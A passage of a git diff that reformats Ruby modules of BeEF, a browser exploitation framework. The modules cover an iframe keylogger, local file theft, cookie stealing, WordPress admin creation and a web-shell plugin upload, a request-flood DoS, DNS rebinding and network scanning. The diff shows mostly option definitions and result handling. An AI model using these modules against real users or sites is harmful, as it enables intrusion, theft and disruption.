3\x6a\x90\x06\x2e\x1a\x1e\x20\x4c\x4f\x39\x8f\xf4\xa4\x0c\xfc\x68\xb7\x05\x0a\xad\x9a\xad\x77\x3b\xa8\x14\x0a\xb8\x69\x9d\xa0\x6b\xd0\xa3\x96\xa9\x62\x06\xa3\x09\xb5\x34\x0f\xa4\x5a\x27\x04\x09\xa9\x87\x16\xa9\x53\x2e\x2a\x6b\x07\x03\xa9\xe6\xe2\x25\x08\x23\x8b\x25\x92\xa8\x5f\x01\x42\xf4\x3e\x04\x37\xe9\xab\x6c\x61\x4f\xe3\x69\x1f\x4e\xe2\xee\xcf\xd6\x79\x63\xbd\x1e\x55\x75\x42\x43\x8a\xd2\xc2\x32\xb1\xa9\x9c\x68\x53\x58\xfa\x5f\xb5\x34\x31\xac\x0b\x0e\x02\xef\x63\x10\x66\x81\x4b\x24\xd1\x65\x01\x08\x11\xb5\xaa\xa1\x1c\x13\x0a\xb2\xdd\x0d\xa1\xc5\x7e\x50\x53\x9e\x94\x25\xbe\xa7\xea\xd7\x86\x04\xa4\x4a\xdd\x07\xc1\x5b\x25\x91\x44\x97\x15\x20\x44\xd4\x43\x89\x8a\x83\x7e\xe1\xe0\x00\x46\x30\x9e\xc2\x78\xa4\x08\x18\xbf\x7e\xfc\x7d\xe4\xa9\xa2\x7a\xef\x4d\xd2\xad\x96\xc8\x56\x00\xd2\xa4\x24\x41\x68\x6c\x9d\x25\x2e\x50\x92\x23\x34\xf9\xf6\x76\xc6\x7f\x61\x3c\xb8\x1f\x24\x87\x04\x0e\x89\x2e\x89\xfa\x73\x86\x19\x01\x86\x3a\xff\x7d\x00\xa1\x9e\xfd\x97\x3e\x96\x1c\xf7\x48\xe0\x90\x68\x20\x01\xa4\x25\x65\x89\x92\x84\x7a\x6a\x59\xbb\xd8\x88\xba\x36\xdc\x89\x8b\x4f\x5a\x92\x48\x22\x9b\x05\x08\x11\x75\x93\x7b\x8f\xf1\x7c\x2b\xee\xf4\xd4\x4e\x87\xaa\xac\xb6\x4a\xb7\x56\xa2\x81\x0e\x10\x0b\x1d\x65\xbc\x04\x42\x83\x03\x72\xc3\x9e\x43\xe7\x13\x58\x3b\x23\x1a\x1b\x46\xc9\x86\x34\x71\x37\x5e\xba\xad\x12\x0d\x04\x23\xbd\x27\x44\xa9\xe5\x7b\x44\x26\x2f\x57\x14\x84\x81\x94\x43\x19\x87\x33\xa6\x7c\x15\x67\x34\xb7\xb4\x26\x00\xe5\x41\x28\x7d\xa5\x21\xf6\xbb\x20\x15\x34\x49\xd4\x07\xf4\xff\x05\x18\x00\x7c\x62\x9e\xd7\xaf\x91\x9f\x33\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82' } ] - end - def post_execute - save({'result' => @datastore['result']}) end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb index 76cca1667..cde53c3da 100644 --- a/modules/misc/iframe_keylogger/module.rb +++ b/modules/misc/iframe_keylogger/module.rb @@ -4,18 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Iframe_keylogger < BeEF::Core::Command - def self.options - return [ - {'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' =>'/demos/secret_page.html', 'width' => '400px', 'height' => '50px'}, - {'name' => 'sendBackInterval', 'ui_label' => 'Send Back Interval (ms)', 'value' => '2000', 'width'=>'100px' } + [ + { 'name' => 'iFrameSrc', 'ui_label' => 'iFrame Src', 'type' => 'textarea', 'value' => '/demos/secret_page.html', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'sendBackInterval', 'ui_label' => 'Send Back Interval (ms)', 'value' => '2000', 'width' => '100px' } ] end - + def post_execute content = {} content['keystrokes'] = @datastore['keystrokes'] save content end - end diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb index 2acae33b1..b70c63230 100644 --- a/modules/misc/iframe_sniffer/module.rb +++ b/modules/misc/iframe_sniffer/module.rb @@ -4,23 +4,22 @@ # See the file 'doc/COPYING' for copying permission # class Iframe_sniffer < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/misc/iframe_sniffer/leakyframe.js','/leakyframe','js') - end - + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/misc/iframe_sniffer/leakyframe.js', '/leakyframe', 'js') + end + def self.options - return [ - {'name' => 'inputUrl', 'ui_label'=>'input URL', 'type' => 'textarea', 'value' =>'http://en.wikipedia.org/wiki/Beef', 'width' => '400px', 'height' => '50px'}, - {'name' => 'anchorsToCheck', 'ui_label' => 'anchors to check', 'value' => 'History,Exploit,Etymology,References,ABCDE', 'type' => 'textarea', 'width' => '400px', 'height' => '100px' } + [ + { 'name' => 'inputUrl', 'ui_label' => 'input URL', 'type' => 'textarea', 'value' => 'http://en.wikipedia.org/wiki/Beef', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'anchorsToCheck', 'ui_label' => 'anchors to check', 'value' => 'History,Exploit,Etymology,References,ABCDE', 'type' => 'textarea', 'width' => '400px', + 'height' => '100px' } ] end - + def post_execute content = {} content['resultList'] = @datastore['resultList'] BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('leakyframe.js') save content end - end diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb index ecdca5932..196663ff6 100644 --- a/modules/misc/invisible_iframe/module.rb +++ b/modules/misc/invisible_iframe/module.rb @@ -4,15 +4,13 @@ # See the file 'doc/COPYING' for copying permission # class Invisible_iframe < BeEF::Core::Command + def self.options + [ + { 'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/' } + ] + end - def self.options - return [ - {'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb index 4e1d86885..5d8532836 100644 --- a/modules/misc/local_file_theft/module.rb +++ b/modules/misc/local_file_theft/module.rb @@ -8,21 +8,18 @@ # Shamelessly plagurised from kos.io/xsspwn class Local_file_theft < BeEF::Core::Command - def self.options - return [ - {'name' => 'target_file', - 'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', - 'ui_label' => 'Target file', - 'value' => 'autodetect' - } + [ + { 'name' => 'target_file', + 'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', + 'ui_label' => 'Target file', + 'value' => 'autodetect' } ] end - - def post_execute + + def post_execute content = {} content['result'] = @datastore['result'] save content - end - + end end diff --git a/modules/misc/nosleep/module.rb b/modules/misc/nosleep/module.rb index 476eb4dfc..3dccf438d 100644 --- a/modules/misc/nosleep/module.rb +++ b/modules/misc/nosleep/module.rb @@ -5,14 +5,13 @@ # class No_sleep < BeEF::Core::Command def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/misc/nosleep/NoSleep.min.js','/NoSleep', 'js') - end - - def self.options - return [ - ] + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/misc/nosleep/NoSleep.min.js', '/NoSleep', 'js') end - + + def self.options + [] + end + def post_execute content = {} content['result'] = @datastore['result'] diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb index 78d88cb3e..039deba96 100644 --- a/modules/misc/raw_javascript/module.rb +++ b/modules/misc/raw_javascript/module.rb @@ -4,20 +4,18 @@ # See the file 'doc/COPYING' for copying permission # class Raw_javascript < BeEF::Core::Command - def self.options - return [ - {'name' => 'cmd', 'description' => 'Javascript Code', 'ui_label' => 'Javascript Code', 'value' => "alert(\'BeEF Raw Javascript\');\nreturn \'It worked!\';", 'type' => 'textarea', 'width' => '400px', 'height' => '100px'}, + [ + { 'name' => 'cmd', 'description' => 'Javascript Code', 'ui_label' => 'Javascript Code', 'value' => "alert(\'BeEF Raw Javascript\');\nreturn \'It worked!\';", + 'type' => 'textarea', 'width' => '400px', 'height' => '100px' } ] end - + # # This method is being called when a zombie sends some # data back to the framework. # def post_execute - - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/misc/read_gmail/module.rb b/modules/misc/read_gmail/module.rb index 51e1619d7..d4c015501 100644 --- a/modules/misc/read_gmail/module.rb +++ b/modules/misc/read_gmail/module.rb @@ -14,13 +14,11 @@ # limitations under the License. # class Read_gmail < BeEF::Core::Command - # # This method is being called when a zombie sends some # data back to the framework. # def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/misc/track_physical_movement/module.rb b/modules/misc/track_physical_movement/module.rb index abf3f2993..1a492ebcc 100644 --- a/modules/misc/track_physical_movement/module.rb +++ b/modules/misc/track_physical_movement/module.rb @@ -7,7 +7,8 @@ class Track_physical_movement < BeEF::Core::Command def self.options [] end + def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/misc/unblockui/module.rb b/modules/misc/unblockui/module.rb index ecc0f5888..c834b12ae 100644 --- a/modules/misc/unblockui/module.rb +++ b/modules/misc/unblockui/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Unblockui < BeEF::Core::Command - def post_execute content = {} content['result'] = @datastore['result'] save content end - end diff --git a/modules/misc/wordpress/add_user/module.rb b/modules/misc/wordpress/add_user/module.rb index d9de78a28..ae8cdd47a 100644 --- a/modules/misc/wordpress/add_user/module.rb +++ b/modules/misc/wordpress/add_user/module.rb @@ -1,9 +1,9 @@ # # Copyright (c) Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission -# +# # This is a complete rewrite of the original module exploits/wordpress_add_admin which was not working anymore -# +# # Original Author: Daniel Reece (@HBRN8). # Rewritten by Erwan LR (@erwan_lr | WPScanTeam) - https://wpscan.org/ # @@ -12,25 +12,24 @@ require_relative '../wordpress_command' class Wordpress_add_user < WordPressCommand def self.options super() + [ - { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'beef' }, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'beef' }, { 'name' => 'password', 'ui_label' => 'Pwd', 'value' => SecureRandom.hex(5) }, { 'name' => 'email', 'ui_label' => 'Email', 'value' => '' }, { 'name' => 'role', - 'type' => 'combobox', - 'ui_label' => 'Role', - 'store_type' => 'arraystore', + 'type' => 'combobox', + 'ui_label' => 'Role', + 'store_type' => 'arraystore', 'store_fields' => ['role'], - 'store_data' => [['administrator'], ['editor'], ['author'], ['contributor'], ['subscriber']], - 'value' => 'administrator', - 'valueField' => 'role', + 'store_data' => [['administrator'], ['editor'], ['author'], ['contributor'], ['subscriber']], + 'value' => 'administrator', + 'valueField' => 'role', 'displayField' => 'role', - 'mode' => 'local', - } - #{ 'name' => 'domail', 'type' => 'checkbox', 'ui_label' => 'Success mail?:', 'checked' => 'true' }, + 'mode' => 'local' } + # { 'name' => 'domail', 'type' => 'checkbox', 'ui_label' => 'Success mail?:', 'checked' => 'true' }, # If one day optional options are supported: - #{ 'name' => 'url', 'ui_label' => 'Website:', 'value' => '' }, - #{ 'name' => 'fname', 'ui_label' => 'FirstName:', 'value' => '' }, - #{ 'name' => 'lname', 'ui_label' => 'LastName:', 'value' => '' } + # { 'name' => 'url', 'ui_label' => 'Website:', 'value' => '' }, + # { 'name' => 'fname', 'ui_label' => 'FirstName:', 'value' => '' }, + # { 'name' => 'lname', 'ui_label' => 'LastName:', 'value' => '' } ] end end diff --git a/modules/misc/wordpress/upload_rce_plugin/module.rb b/modules/misc/wordpress/upload_rce_plugin/module.rb index 38164f0c0..fed292d16 100644 --- a/modules/misc/wordpress/upload_rce_plugin/module.rb +++ b/modules/misc/wordpress/upload_rce_plugin/module.rb @@ -19,23 +19,23 @@ class Wordpress_upload_rce_plugin < WordPressCommand # This allows easy modification of the beefbind.php to suit the needs, as well as being automatically generated # even when the module is used with automated rules def self.generate_zip_payload(auth_key) - stringio = Zip::OutputStream::write_buffer do |zio| - zio.put_next_entry("beefbind.php") - + stringio = Zip::OutputStream.write_buffer do |zio| + zio.put_next_entry('beefbind.php') + file_content = File.read(File.join(File.dirname(__FILE__), 'beefbind.php')).to_s file_content.gsub!(/#SHA1HASH#/, Digest::SHA1.hexdigest(auth_key)) - + zio.write(file_content) end stringio.rewind - + payload = stringio.sysread escaped_payload = '' # Escape payload to be able to put it in the JS payload.each_byte do |byte| - escaped_payload << "\\" + ("x%02X" % byte) + escaped_payload << ("\\#{'x%02X' % byte}") end escaped_payload diff --git a/modules/misc/wordpress/wordpress_command.rb b/modules/misc/wordpress/wordpress_command.rb index b2ed21a26..20775fe09 100644 --- a/modules/misc/wordpress/wordpress_command.rb +++ b/modules/misc/wordpress/wordpress_command.rb @@ -10,7 +10,7 @@ require 'securerandom' class WordPressCommand < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/misc/wordpress/wp.js', '/wp', 'js') - end + end # If we could retrive the hooked URL, we could try to determine the wp_path to be set below def self.options @@ -18,13 +18,13 @@ class WordPressCommand < BeEF::Core::Command { 'name' => 'wp_path', 'ui_label' => 'WordPress Path', 'value' => '/' } ] end - + # This one is triggered each time a beef.net.send is called def post_execute BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('wp.js') return unless @datastore['result'] - + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/misc/wordpress_post_auth_rce/module.rb b/modules/misc/wordpress_post_auth_rce/module.rb index a654ab6bb..137270a5c 100644 --- a/modules/misc/wordpress_post_auth_rce/module.rb +++ b/modules/misc/wordpress_post_auth_rce/module.rb @@ -4,16 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Wordpress_post_auth_rce < BeEF::Core::Command - def self.options - return [ - {'name'=>'wordpress_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-wordpress.site/wordpress','width'=>'400px'} + [ + { 'name' => 'wordpress_url', 'ui_label' => 'Target Web Server', 'value' => 'http://vulnerable-wordpress.site/wordpress', 'width' => '400px' } ] end - + def post_execute return if @datastore['result'].nil? - save({'result' => @datastore['result']}) + + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/network/ADC/f5_bigip_cookie_disclosure/module.rb b/modules/network/ADC/f5_bigip_cookie_disclosure/module.rb index 78ef075d5..efe8a4971 100644 --- a/modules/network/ADC/f5_bigip_cookie_disclosure/module.rb +++ b/modules/network/ADC/f5_bigip_cookie_disclosure/module.rb @@ -4,10 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class F5_bigip_cookie_disclosure < BeEF::Core::Command - def post_execute return if @datastore['results'].nil? - save({'BigIPCookie' => @datastore['results']}) - end + save({ 'BigIPCookie' => @datastore['results'] }) + end end diff --git a/modules/network/ADC/f5_bigip_cookie_stealing/module.rb b/modules/network/ADC/f5_bigip_cookie_stealing/module.rb index adb1407c2..2a1eab5c4 100644 --- a/modules/network/ADC/f5_bigip_cookie_stealing/module.rb +++ b/modules/network/ADC/f5_bigip_cookie_stealing/module.rb @@ -4,10 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class F5_bigip_cookie_stealing < BeEF::Core::Command - def post_execute return if @datastore['result'].nil? - save({'BigIPSessionCookies' => @datastore['BigIPSessionCookies']}) - end + save({ 'BigIPSessionCookies' => @datastore['BigIPSessionCookies'] }) + end end diff --git a/modules/network/DOSer/module.rb b/modules/network/DOSer/module.rb index c367dc664..453626be0 100644 --- a/modules/network/DOSer/module.rb +++ b/modules/network/DOSer/module.rb @@ -4,23 +4,22 @@ # See the file 'doc/COPYING' for copying permission # class Doser < BeEF::Core::Command - def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/DOSer/worker.js', '/worker', 'js') end def self.options - return [ - {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'}, - {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'}, - {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'}, - {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'} + [ + { 'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path' }, + { 'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '10' }, + { 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'POST' }, + { 'name' => 'post_data', 'ui_label' => 'POST data', 'value' => 'key=value&&Aa=Aa&BB' } ] end - + def post_execute return if @datastore['result'].nil? - save({'result' => @datastore['result']}) + + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/network/cross_origin_scanner_cors/module.rb b/modules/network/cross_origin_scanner_cors/module.rb index bf44b6b7e..f86a2f885 100644 --- a/modules/network/cross_origin_scanner_cors/module.rb +++ b/modules/network/cross_origin_scanner_cors/module.rb @@ -4,40 +4,34 @@ # See the file 'doc/COPYING' for copying permission # class Cross_origin_scanner_cors < BeEF::Core::Command - def post_execute content = {} content['result'] = @datastore['result'] save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^proto=(https?)&ip=(.+)&port=(\d+)&status/ - session_id = @datastore['beefhook'] - - # log the network service - if @datastore['results'] =~ /^proto=(https?)&ip=(.+)&port=([\d]+)&status/ - proto = $1 - ip = $2 - port = $3 - type = 'HTTP Server (CORS)' - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found HTTP server #{ip}:#{port}") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) - end - end + # log the network service + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + type = 'HTTP Server (CORS)' + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found HTTP server #{ip}:#{port}") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: type) end - end def self.options - return [ - {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, - {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, - {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '2'}, - {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '2'}, - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'} + [ + { 'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254' }, + { 'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080' }, + { 'name' => 'threads', 'ui_label' => 'Workers', 'value' => '2' }, + { 'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '2' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10' } ] end - end diff --git a/modules/network/cross_origin_scanner_flash/module.rb b/modules/network/cross_origin_scanner_flash/module.rb index 9e7c40648..9db145ad5 100644 --- a/modules/network/cross_origin_scanner_flash/module.rb +++ b/modules/network/cross_origin_scanner_flash/module.rb @@ -4,9 +4,8 @@ # See the file 'doc/COPYING' for copying permission # class Cross_origin_scanner_flash < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_cached('/modules/network/cross_origin_scanner_flash/ContentHijacking.swf','/objects/ContentHijacking','swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_cached('/modules/network/cross_origin_scanner_flash/ContentHijacking.swf', '/objects/ContentHijacking', 'swf') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_cached('/modules/network/cross_origin_scanner_flash/swfobject.js', '/swfobject', 'js') end @@ -16,39 +15,37 @@ class Cross_origin_scanner_flash < BeEF::Core::Command save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true + return unless configuration.get('beef.extension.network.enable') == true - session_id = @datastore['beefhook'] + session_id = @datastore['beefhook'] - # log discovered hosts - if @datastore['results'] =~ /^ip=(.+)&status=alive$/ - ip = $1 - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found host #{ip}") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip) - end - # log discovered network services - elsif @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&title/ - proto = $1 - ip = $2 - port = $3 - type = 'HTTP Server (Flash)' - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found HTTP server #{ip}:#{port}") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) - end + # log discovered hosts + case @datastore['results'] + when /^ip=(.+)&status=alive$/ + ip = Regexp.last_match(1) + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip) + end + # log discovered network services + when /^proto=(.+)&ip=(.+)&port=(\d+)&title/ + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + type = 'HTTP Server (Flash)' + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found HTTP server #{ip}:#{port}") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: type) end end - end def self.options - return [ - {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, - {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, - {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '2'}, - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '5'} + [ + { 'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254' }, + { 'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080' }, + { 'name' => 'threads', 'ui_label' => 'Workers', 'value' => '2' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '5' } ] end - end diff --git a/modules/network/detect_burp/module.rb b/modules/network/detect_burp/module.rb index b5836ef69..181026bc3 100644 --- a/modules/network/detect_burp/module.rb +++ b/modules/network/detect_burp/module.rb @@ -4,23 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Detect_burp < BeEF::Core::Command - def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^has_burp=true&response=PROXY ([\d\.]+:[\d]+)/ - ip = $1.split(':')[0] - port = $1.split(':')[1] - session_id = @datastore['beefhook'] - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'Burp Proxy') - end - end + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^has_burp=true&response=PROXY ([\d.]+:\d+)/ + + ip = Regexp.last_match(1).split(':')[0] + port = Regexp.last_match(1).split(':')[1] + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: 'http', ip: ip, port: port, type: 'Burp Proxy') end end - end - diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb index 25fd41cf6..31472e5d1 100644 --- a/modules/network/detect_soc_nets/module.rb +++ b/modules/network/detect_soc_nets/module.rb @@ -4,19 +4,17 @@ # See the file 'doc/COPYING' for copying permission # class Detect_soc_nets < BeEF::Core::Command - def self.options - return [ - {'name' => 'timeout', 'ui_label' => 'Detection Timeout','value' => '5000'} + [ + { 'name' => 'timeout', 'ui_label' => 'Detection Timeout', 'value' => '5000' } ] end - + def post_execute content = {} content['GMail'] = @datastore['gmail'] content['Facebook'] = @datastore['facebook'] - content['Twitter']= @datastore['twitter'] + content['Twitter'] = @datastore['twitter'] save content end - end diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb index 7be8b2936..2faf27cd2 100644 --- a/modules/network/detect_tor/module.rb +++ b/modules/network/detect_tor/module.rb @@ -4,18 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Detect_tor < BeEF::Core::Command - def self.options - return [ - {'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'}, - {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'} + [ + { 'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg' }, + { 'name' => 'timeout', 'ui_label' => 'Detection timeout', 'value' => '10000' } ] end - + def post_execute return if @datastore['result'].nil? - - save({'result' => @datastore['result']}) + + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb index 382e9e12b..fea67eac3 100644 --- a/modules/network/dns_enumeration/module.rb +++ b/modules/network/dns_enumeration/module.rb @@ -7,20 +7,17 @@ # DNS Enumeration class Dns_enumeration < BeEF::Core::Command - def self.options - return [ - {'name' => 'dns_list', 'ui_label' => 'DNS (comma separated)', 'value' => '%default%'}, - {'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '4000'} + [ + { 'name' => 'dns_list', 'ui_label' => 'DNS (comma separated)', 'value' => '%default%' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '4000' } ] end - + def post_execute content = {} - content['result'] =@datastore['result'] if not @datastore['result'].nil? - if content.empty? - content['fail'] = 'No DNS hosts have been discovered.' - end + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['fail'] = 'No DNS hosts have been discovered.' if content.empty? save content end end diff --git a/modules/network/dns_rebinding/module.rb b/modules/network/dns_rebinding/module.rb index 7594f48fc..f006a5cba 100644 --- a/modules/network/dns_rebinding/module.rb +++ b/modules/network/dns_rebinding/module.rb @@ -1,50 +1,45 @@ class Dns_rebinding < BeEF::Core::Command - def self.options - domain = BeEF::Core::Configuration.instance.get('beef.module.dns_rebinding.domain') - dr_config = BeEF::Core::Configuration.instance.get('beef.extension.dns_rebinding') - url_callback = 'http://'+dr_config['address_proxy_external']+':'+dr_config['port_proxy'].to_s - return [{ - 'name'=>'target', - 'value'=>'192.168.0.1' - }, - { - 'name'=>'domain', - 'value'=>domain - }, - { - 'name'=>'url_callback', - 'value'=>url_callback - }] - end + def self.options + domain = BeEF::Core::Configuration.instance.get('beef.module.dns_rebinding.domain') + dr_config = BeEF::Core::Configuration.instance.get('beef.extension.dns_rebinding') + url_callback = "http://#{dr_config['address_proxy_external']}:#{dr_config['port_proxy']}" + [{ + 'name' => 'target', + 'value' => '192.168.0.1' + }, + { + 'name' => 'domain', + 'value' => domain + }, + { + 'name' => 'url_callback', + 'value' => url_callback + }] + end - def pre_send - dns = BeEF::Extension::Dns::Server.instance - dr_config = BeEF::Core::Configuration.instance.get('beef.extension.dns_rebinding') + def pre_send + dns = BeEF::Extension::Dns::Server.instance + dr_config = BeEF::Core::Configuration.instance.get('beef.extension.dns_rebinding') - addr = dr_config['address_http_external'] - domain = BeEF::Core::Configuration.instance.get('beef.module.dns_rebinding.domain') - target_addr = "192.168.0.1" + addr = dr_config['address_http_external'] + domain = BeEF::Core::Configuration.instance.get('beef.module.dns_rebinding.domain') + target_addr = '192.168.0.1' - if @datastore[0] - target_addr = @datastore[0]['value'] - end - if @datastore[1] - domain = @datastore[1]['value'] - end - - id = dns.add_rule( - :pattern => domain, - :resource => Resolv::DNS::Resource::IN::A, - :response => [addr, target_addr] - ) + target_addr = @datastore[0]['value'] if @datastore[0] + domain = @datastore[1]['value'] if @datastore[1] - dns.remove_rule!(id) - - id = dns.add_rule( - :pattern => domain, - :resource => Resolv::DNS::Resource::IN::A, - :response => [addr, target_addr] - ) + id = dns.add_rule( + pattern: domain, + resource: Resolv::DNS::Resource::IN::A, + response: [addr, target_addr] + ) - end + dns.remove_rule!(id) + + dns.add_rule( + pattern: domain, + resource: Resolv::DNS::Resource::IN::A, + response: [addr, target_addr] + ) + end end diff --git a/modules/network/fetch_port_scanner/module.rb b/modules/network/fetch_port_scanner/module.rb index 69453e174..094fe95b0 100644 --- a/modules/network/fetch_port_scanner/module.rb +++ b/modules/network/fetch_port_scanner/module.rb @@ -4,33 +4,26 @@ # See the file 'doc/COPYING' for copying permission # class Fetch_port_scanner < BeEF::Core::Command - # set and return all options for this module - def self.options - return [ - {'name' => 'ipHost', 'ui_label' => 'Scan IP or Hostname', 'value' => '127.0.0.1'}, - {'name' => 'ports' , 'ui_label' => 'Specific port(s) to scan', 'value' => 'top'} - ] - end - - def post_execute - content = {} - content['result'] = @datastore['result'] - save content - - configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - - session_id = @datastore['beefhook'] - - # log the network service - # will need to once the datastore is confirmed. - # This should basically try and hook the browser - - - end - - end - - end - \ No newline at end of file + def self.options + [ + { 'name' => 'ipHost', 'ui_label' => 'Scan IP or Hostname', 'value' => '127.0.0.1' }, + { 'name' => 'ports', 'ui_label' => 'Specific port(s) to scan', 'value' => 'top' } + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + + configuration 